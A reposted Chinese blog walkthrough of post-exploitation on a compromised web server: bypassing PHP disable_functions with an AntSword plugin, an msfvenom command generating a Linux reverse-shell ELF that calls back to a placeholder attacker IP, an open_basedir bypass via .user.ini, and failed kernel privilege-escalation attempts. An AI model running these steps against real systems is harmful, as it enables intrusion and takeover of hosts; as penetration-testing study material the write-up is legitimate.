记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

disable_functions的绕过+目录突破+提权

2021-03-16 17:20

0x00


正常的操作拿到webshell,在虚拟终端里输入命令都没有反应



在phpinfo里找到disable_functions函数,发现很多命令都被禁用了。



0x01绕过disable_functions


在这里一开始使用了 LD_PRELOAD绕过,发现报错了。


然后使用蚁剑自带插件成功绕过。



然后到tmp目录查找看看,找到了.sock路径。


运行生成一个.antproxy.php文件。



然后连接.antproxy.php发现这个绕过只有一会的时间就会被断开,然后想着在上传木马到靶机,进行反弹shell。



0x02进行反弹shell


使用msf生成木马,我这里使用的是监听80端口,LHOST是你要接收shell反弹回来的IP,-i 表示编码的次数。

msfvenom -p linux/x64/shell_reverse_tcp -i 5 LHOST=x.x.x.x LPORT=80 -f elf -o /root/shell.elf


然后直接把.elf木马放到目标上,在突破disable_functions的时候会有几分钟的时间可以输入命令。在自己接收反弹shell的机器上开启80监听,然后直接运行木马进行反弹。



0x03目录突破


发现有些目录是浏览不了的。



在shell目录下新建.user.ini文件添加open_basedir=:/绕过php.ini的全局限制



可以访问了。



0x04提权


查看linux内核版本大于等于2.6.22,可以尝试CVE-2016-0728 提权(网上有很多相关的文章)



一开始编译出现错误,然后修改 PATH



运行之后半天不见出来东西。。。。



然后使用脏牛的时候问题跟上面一样。不懂是那里出错了。。


上面进行了目录的突破,然后我们可以使用bash反弹。

找到文件写入bash反弹语句



端口监听时候发现也是没有得到想要的。



emmmm,在这里卡了很久,然后人家说中间换了vps。

————————————————


作者:WII-FM,原文链接:https://blog.csdn.net/kong_free/article/details/106891179


干货|渗透学习资料大集合(书籍、工具、技术文档、视频教程)


点击上方,关注公众号

如文章对你有帮助,请支持点下“赞”“在看”


知识来源: https://mp.weixin.qq.com/s?__biz=MzIwMzIyMjYzNA==&mid=2247491162&idx=1&sn=726fa877f54d2da3676dea34684c5b18

阅读:176558 | 评论:0 | 标签:提权

想收藏或者和大家分享这篇好文章→复制链接地址

“disable_functions的绕过+目录突破+提权”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

标签云 ☁